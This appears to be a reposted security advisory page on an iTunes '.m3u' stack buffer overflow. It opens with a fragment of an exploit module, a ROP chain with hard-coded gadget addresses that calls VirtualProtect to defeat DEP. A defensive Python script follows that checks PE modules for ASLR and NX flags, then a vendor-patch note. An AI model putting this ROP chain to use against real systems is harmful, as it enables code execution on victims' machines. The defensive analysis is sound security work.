Apple iTunes '.m3u' File Remote Stack Buffer Overflow Vulnerability (4)

def gimme_rop
  # thanx to mona.py :)
  rop_chain = [
    0x66c9a6c0,                     # POPAD / RET
    # registers
    0x66801044,                     # EDI: RET
    0x7c801ad4,                     # ESI: VirtualProtect [kernel32.dll]
    0x6697aa03,                     # EBP: JMP ESP
    junk,                           # skipped
    0x6c1703e8,                     # EBX: will become 0x3e8 after adding 0x93e90000 (dwSize)
    0xffffffd6,                     # EDX: will become 0x40 after adding 0x6a (flNewProtect)
    0x673650b0,                     # ECX: lpflOldProtect
    0x90909090,                     # EAX: nops
    # correct dwSize and flNewProtect
    0x66b7de1b,                     # ADD EBX, 0x93E90000 / RET
    0x66975c56,                     # ADD EDX, 0x6A / RET
    # throw it on the stack
    0x6684b5c6                      # PUSHAD / RET
  ].pack("V*")

  return rop_chain
end

def junk
  return rand_text_alpha(4).unpack("L")[0].to_i
end

def status(req, cli, action)
  print_status("Request for #{req.uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
end

end
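The chain above only works because every gadget and the VirtualProtect entry point are hard-coded absolute addresses: it assumes the iTunes support DLLs and kernel32.dll load at fixed bases and that the process must call VirtualProtect to get around DEP. The check a defender wants is therefore whether the loaded modules opt into ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) and NX (IMAGE_DLLCHARACTERISTICS_NX_COMPAT). The following is an added example written for this page, not code from the advisory or from the Metasploit module above; it reads those flags straight from the PE optional header (the field offsets are from the PE/COFF specification), verifies the 32-bit wraparound the chain's comments rely on, and builds a constructed minimal PE image in memory so it runs offline.

```python
"""Check PE images for the ASLR/NX opt-in flags that defeat fixed-address ROP chains.

Added example; the PE field offsets are from the PE/COFF specification, the
sample image built by build_fake_pe() is constructed for testing.
"""
import struct
from pathlib import Path

# DllCharacteristics bits (PE/COFF specification)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # image may be rebased (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # image is DEP/NX compatible
MASK32 = 0xFFFFFFFF


def pe_mitigations(data: bytes) -> dict:
    """Return which exploit mitigations a PE image opts into.

    Walks DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional header.
    DllCharacteristics sits at offset 70 of the optional header for both
    PE32 (magic 0x10B) and PE32+ (magic 0x20B).
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    if size_of_optional < 72:
        raise ValueError("optional header too short to carry DllCharacteristics")
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def scan_modules(directory: str) -> dict:
    """Map every .dll/.exe under `directory` to its mitigation flags (hypothetical helper)."""
    results = {}
    for path in Path(directory).rglob("*"):
        if path.suffix.lower() in (".dll", ".exe") and path.is_file():
            try:
                results[str(path)] = pe_mitigations(path.read_bytes())
            except (ValueError, struct.error) as exc:
                results[str(path)] = {"error": str(exc)}
    return results


def effective_args(ebx_seed: int = 0x6C1703E8, edx_seed: int = 0xFFFFFFD6) -> dict:
    """Reproduce the 32-bit wraparound the chain's comments describe.

    Seeds are the EBX/EDX values from the chain above; the adds are the
    gadgets 'ADD EBX, 0x93E90000' and 'ADD EDX, 0x6A'. The result is what
    PUSHAD hands to VirtualProtect as dwSize and flNewProtect.
    """
    return {
        "dwSize": (ebx_seed + 0x93E90000) & MASK32,
        "flNewProtect": (edx_seed + 0x6A) & MASK32,   # 0x40 = PAGE_EXECUTE_READWRITE
    }


def build_fake_pe(dll_characteristics: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE image: enough headers for pe_mitigations(), no sections."""
    opt_size = 240 if pe32plus else 224
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                # e_lfanew -> right after DOS header
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,    # Machine
                       0, 0, 0, 0,                       # sections, timestamp, symtab, nsyms
                       opt_size,                         # SizeOfOptionalHeader
                       0x2102)                           # Characteristics: EXE | 32BIT | DLL
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)   # Magic
    struct.pack_into("<H", opt, 70, dll_characteristics)           # DllCharacteristics
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    print("chain arguments after wraparound:", {k: hex(v) for k, v in effective_args().items()})
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        for name, flags in scan_modules(target).items():
            print(name, flags)
    else:
        print("constructed image without flags:", pe_mitigations(build_fake_pe(0)))
```

Run it against an installation directory to list every module that lacks DYNAMIC_BASE or NX_COMPAT; a module without DYNAMIC_BASE is exactly the kind of fixed-base library that makes hard-coded gadget addresses like those in the chain reliable across machines.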

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Apple
-----
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

Content copyright notice: unless otherwise stated, all articles are original to this site.

Reprints must credit the source: https://www.heiqu.com/wwwgwg.html